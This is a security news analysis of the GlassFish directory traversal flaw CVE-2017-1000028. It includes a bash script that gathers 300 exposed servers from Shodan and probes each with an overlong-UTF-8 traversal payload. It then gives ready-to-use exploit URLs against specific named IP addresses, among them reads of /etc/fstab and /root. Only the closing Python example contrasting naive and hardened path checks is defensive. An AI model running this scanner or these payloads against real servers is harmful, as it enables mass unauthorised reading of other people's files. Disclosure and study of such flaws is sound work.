
Oracle GlassFish: Vulnerability Exposes Data on Thousands of Servers Worldwide (Analysis)

Oracle GlassFish vulnerability: security researcher Dimitris Roussis analyses for us a vulnerability in the well-known Oracle GlassFish application server, tracked as CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028), which currently exposes data on thousands of servers worldwide.


Exploiting this security hole allows an attacker, with a plain unauthenticated HTTP request to the administration port, to read through a directory traversal attack any file on the machine on which the application server is installed (any file, that is, which the account running GlassFish is permitted to read).

In the analysis carried out by the researcher, a sample of 300 servers with GlassFish version 4.1 installed is first collected through the Shodan search engine.

Then, using an automated script written by the researcher, the servers are checked to find out which of them are actually vulnerable.

#!/bin/bash
# Get 300 results from the Shodan search engine (GlassFish 4.1 with the admin port 4848 exposed)
shodan search --limit 300 --fields ip_str 'GlassFish 4.1 port:4848' > servers_ip.txt

# Sort the IP addresses numerically, octet by octet
sort -n -t. -k1,1 -k2,2 -k3,3 -k4,4 servers_ip.txt > servers_sort.txt

# Remove all whitespace
sed -r 's/\s+//g' servers_sort.txt > servers.txt

# Delete temporary files
rm servers_ip.txt servers_sort.txt

# Server list
input="servers.txt"

# Ten overlong-UTF-8-encoded "../" sequences (%c0%ae = '.', %c0%af = '/'),
# i.e. http://server_ip:4848/theme/META-INF/../../../../../../../../../../
traversal=""
for i in $(seq 1 10); do
    traversal="${traversal}%c0%ae%c0%ae%c0%af"
done

# Check each server for the vulnerability
while IFS= read -r ip; do
    url="http://$ip:4848/theme/META-INF/$traversal"
    echo -n "ip: $ip"
    fetch=$(curl -s -o /dev/null --max-time 5 -w "%{http_code}" "$url")
    if [ "$fetch" = "200" ]; then
        echo " - Connection Successful! Server is vulnerable"
        # Save result in vulnerable_servers.txt
        echo "$url" >> vulnerable_servers.txt
    else
        echo " - Connection Failed! Server is not vulnerable"
    fi
done < "$input"


The end result of the script is a file containing links (URLs) through which the vulnerability can be exploited directly.

Opening the links from that file in a browser, we can see a listing of all the files in the root (/) of the server.

Examples include:

Windows Server & Hosting

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af


Linux Server

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af


We can now access any file we want on the server by appending its path to the end of the URL (without a leading slash, since the traversal prefix already ends in an encoded "/"), e.g.:

/etc/fstab

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/root

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot
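To make the encoding trick in the URLs above concrete, here is an added example (an editor's illustration, not the researcher's script and not GlassFish's own code). It takes a sample path constructed exactly like the URLs above (/theme/META-INF/, ten encoded "../" sequences, then etc/fstab), decodes it the way a lenient UTF-8 decoder would, shows that a strict decoder rejects the same bytes, and contrasts a naive ".." filter on the raw request with a hardened check that decodes first and normalizes afterwards. The lenient decoder models the class of bug only; how GlassFish itself parsed the path is not shown on this page, and the function names are the example's own.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Constructed sample path, built the same way as the URLs above: the servlet
# path /theme/META-INF/ followed by ten overlong-UTF-8-encoded "../"
# sequences (%c0%ae = '.', %c0%af = '/') and the target file appended
# without a leading slash.
TRAVERSAL = "%c0%ae%c0%ae%c0%af" * 10
SAMPLE_PATH = "/theme/META-INF/" + TRAVERSAL + "etc/fstab"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way a permissive decoder does (illustrative model, not
    GlassFish's code): any lead byte 0xC0..0xDF followed by a continuation
    byte is accepted as a 2-byte sequence, so the overlong forms 0xC0 0xAE
    and 0xC0 0xAF become '.' and '/'. Strict decoders reject 0xC0/0xC1 leads."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte sequence at offset {i}")
    return "".join(out)


def lenient_server_view(url_path: str) -> str:
    """The filesystem path a server with a lenient decoder ends up with."""
    return lenient_utf8_decode(unquote_to_bytes(url_path))


def strict_decode(url_path: str):
    """Percent-decode, then decode as strict UTF-8 (RFC 3629). Returns None
    when the bytes contain overlong or otherwise invalid sequences."""
    try:
        return unquote_to_bytes(url_path).decode("utf-8")
    except UnicodeDecodeError:
        return None


def naive_is_safe(url_path: str) -> bool:
    """Vulnerable pattern: look for '..' in the still-encoded request path.
    The overlong encoding hides the dots, so this check passes the attack."""
    return ".." not in url_path


def hardened_is_safe(url_path: str, web_root: str = "/theme") -> bool:
    """Hardened pattern: decode first (rejecting invalid UTF-8), then
    normalize and confine the result to the web root before touching the
    filesystem."""
    decoded = strict_decode(url_path)
    if decoded is None:
        return False
    normalized = posixpath.normpath(decoded)
    return normalized == web_root or normalized.startswith(web_root + "/")


if __name__ == "__main__":
    print("raw request path :", SAMPLE_PATH)
    print("lenient decoder  :", lenient_server_view(SAMPLE_PATH))
    print("strict decoder   :", strict_decode(SAMPLE_PATH))
    print("naive check      :", "safe" if naive_is_safe(SAMPLE_PATH) else "blocked")
    print("hardened check   :", "safe" if hardened_is_safe(SAMPLE_PATH) else "blocked")
```

The order of operations is the whole point: a filter that inspects the percent-encoded request never sees a ".." and lets the request through, while decoding strictly (which already rejects the overlong bytes), normalizing, and only then comparing against the web root blocks both this encoded variant and a plain ../ traversal.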

 

The above study demonstrates, on the one hand, that a single vulnerability can lead to the disclosure of data on a large scale worldwide and, on the other hand, the need for system administrators to apply software updates immediately; it also shows why the GlassFish administration console (port 4848) should never be reachable from the public internet in the first place, since that exposure is exactly what the Shodan query relies on.

The SecNews editorial team sincerely thanks researcher Dimitrios Roussis for the valid and timely information.


* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652
